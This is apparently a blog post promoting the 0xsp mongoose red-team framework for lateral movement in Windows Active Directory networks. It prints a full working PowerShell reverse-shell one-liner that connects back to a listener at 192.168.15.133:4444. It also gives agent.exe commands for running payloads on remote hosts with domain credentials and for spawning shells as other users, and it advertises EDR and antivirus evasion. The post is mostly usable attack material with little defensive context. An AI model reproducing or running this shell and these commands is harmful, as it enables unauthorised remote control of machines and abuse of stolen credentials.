image

In this blog, I am going to explain some of the unique features of 0xsp mongoose, which I am sure most of the red teamers still didn't try to explore the powerful tactics of this framework. so take a chance to spend 2 minutes to read these two unique features

Lateral movements

Lateral movement refers to the techniques that a cyber attacker uses, after gaining initial access, to move deeper into a network in search of sensitive data and other high-value assets. After entering the network, the attacker maintains ongoing access by moving through the compromised environment and obtaining increased privileges using various tools. ( crowd strike).

while developing mongoose red, I was thinking about how to make this feature fancier byexpending the functionality of lateral movement to be more satisfying. With more research, I have noticed that 50 - 60 % of cyber people spend between 5-10 minutes to achieve a lateral movement with their reverse shell or execution for specific commands, which allow them to gain access to a targeted system.

In this framework, you don't need to spend that time with bidirectional channel support. The red teamer will grab his on-liner backdoor from the C2 server without a need to supplement of long commands into WMI CLI.

Does red mongoose help ?!

  • bypass EDR to conduct lateral movement
  • the weaponization of payload execution
  • Undetectable by AV
  • Fast  ⚡

Preparing the attack

first, we have to save our desired payload in the mongoose node js application by navigating into the commands tab and past on-liner payload. In my case, I am going to use the following PowerShell reverse shell.

powershell.exe function cln{if($c.Connected -eq $true){$c.Close()};if($p.ExitCode -ne $null){$p.Close()};exit};$c=New-Object System.Net.Sockets.TcpClient;$c.Connect('192.168.15.133',4444);if($c.Connected -ne $true){cln};$s=$c.GetStream();$b=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=New-Object System.Text.AsciiEncoding;while($os.Peek()-ne -1){$o+=$e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;while($true){if($c.Connected -ne $true){cln};$pos=0;$i=1;while(($i -gt 0)-and($pos -lt $b.Length)){$read=$s.Read($b,$pos,$b.Length -$pos);$pos+=$read;if($pos -and($nb[0..$($pos-1)]-contains 10)){break};if($pos -gt 0){$str=$e.GetString($b,0,$pos);$is.Write($str);Start-Sleep 1;if($p.ExitCode -ne $null){cln}else{$o=$e.GetString($os.Read());while($os.Peek()-ne -1){$o+=$e.GetString($os.Read());if($o -eq $str){$o=''}};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$str=$null}}else{cln}}};

image

After setting up the payload and listener, we can now start the attack quickly, by using the following argument.

agent.exe -lr -host targethost -username domainuser -password "HERE" -srvhost nodejs

image

Attacking Domain/Local users

one of the scenarios that may you face while conducting red teaming simulation on windows active directory environments how can use the level or other domain user token. Basically, in typical cases, you have to close your current RDP session if you are with RDP and then connect without the user to try his access level. That's not a good technique. There is another technique that we know, but using 0xsp mongoose, you don't need that many efforts.

we can quickly spawn another undetectable reverse shell by other domain users account with simple command as :

agent.exe -r username password cmd.exe domain

image

words to say

0xsp mongoose is an open-sourced project; your contribution and shown support are one of the reasons that encouraged me to push more updates and implement more development in the future.

Resources